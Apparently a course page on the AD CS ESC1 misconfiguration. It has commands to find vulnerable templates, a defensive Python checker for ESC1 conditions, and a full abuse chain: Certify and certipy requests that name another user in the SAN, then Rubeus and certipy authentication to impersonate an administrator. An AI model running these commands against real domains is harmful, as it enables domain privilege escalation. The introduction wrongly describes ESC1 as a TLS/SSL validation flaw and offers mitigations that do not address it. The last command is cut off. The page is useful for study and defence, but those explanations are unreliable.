ADCS Certified Enterprise Security Professional
ESC1 – Understand the Arbitrary Subject Alternative Name Vulnerability

The Arbitrary Subject Alternative Name (SAN) Vulnerability is a flaw in the certificate validation mechanisms of the TLS/SSL protocols.

It allows an attacker to obtain certificates whose SAN field contains names the attacker is not authorized to use, which can enable phishing or man-in-the-middle (MITM) attacks.

The root cause is inadequate verification both of the entity requesting the certificate and of the domains listed in the SAN field.

To mitigate this vulnerability, it's essential to:

  • Implement strict validation processes for certificate requests, ensuring that the entity requesting the certificate has legitimate control over the domains listed in the SAN field.

  • Use Certificate Transparency logs to monitor and identify potentially malicious certificates.

  • Employ modern TLS libraries and configurations that adhere to best practices in certificate validation.

To find vulnerable certificate templates, you can run:

Certify.exe find /vulnerable
certipy find -u [email protected] -p Passw0rd -dc-ip 172.16.126.128
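
As an added example (not code from the course page or from Certify/certipy), the check below evaluates a template's AD attributes for the same ESC1 conditions the tools above look for; the template records are constructed sample input, and the attribute names follow the AD certificate-template schema.

```python
# Added example, not from the course page: flag certificate templates that
# meet the ESC1 conditions. Template records are constructed sample input;
# in practice they come from CN=Certificate Templates,CN=Public Key Services.

# msPKI-Certificate-Name-Flag bit: requester supplies subject and SAN
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag bit: requests wait for CA manager approval
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# EKUs usable for domain authentication (an empty EKU list also qualifies)
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}
# Principals whose enroll right makes a template reachable by any domain user
LOW_PRIV_PRINCIPALS = {"Domain Users", "Authenticated Users", "Everyone",
                       "Domain Computers"}

def esc1_findings(template):
    """Return the ESC1 conditions a template meets; all five = vulnerable."""
    findings = []
    if template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        findings.append("enrollee supplies subject/SAN")
    if not template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        findings.append("no manager approval")
    if template["msPKI-RA-Signature"] == 0:
        findings.append("no authorized signature required")
    ekus = set(template["pKIExtendedKeyUsage"])
    if not ekus or ekus & AUTH_EKUS:
        findings.append("authentication EKU or no EKU")
    if set(template["enroll"]) & LOW_PRIV_PRINCIPALS:
        findings.append("low-privileged principals can enroll")
    return findings

def is_esc1(template):
    return len(esc1_findings(template)) == 5

# Constructed samples: one template with every ESC1 condition, one hardened
VULN_TEMPLATE = {"name": "VulnTemplate", "msPKI-Certificate-Name-Flag": 0x1,
                 "msPKI-Enrollment-Flag": 0x0, "msPKI-RA-Signature": 0,
                 "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
                 "enroll": ["Domain Users"]}
SAFE_TEMPLATE = {"name": "User",  # 0x02000000 = SAN built from the AD UPN
                 "msPKI-Certificate-Name-Flag": 0x02000000,
                 "msPKI-Enrollment-Flag": 0x2, "msPKI-RA-Signature": 0,
                 "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
                 "enroll": ["Domain Users"]}
```

Remediating any one of the five conditions (most commonly clearing ENROLLEE_SUPPLIES_SUBJECT or requiring manager approval) removes the template from the ESC1 result.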

To abuse this vulnerability to impersonate an administrator one could run:

Certify.exe request /ca:dc.theshire.local-DC-CA /template:VulnTemplate /altname:localadmin
certipy req 'corp.local/john:[email protected]' -ca 'corp-CA' -template 'ESC1' -alt '[email protected]'

Then convert the issued certificate to .pfx format and use it to authenticate with Rubeus or certipy:

Rubeus.exe asktgt /user:localadmin /certificate:localadmin.pfx /password:password123! /ptt
certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'corp.local' -dc-ip 
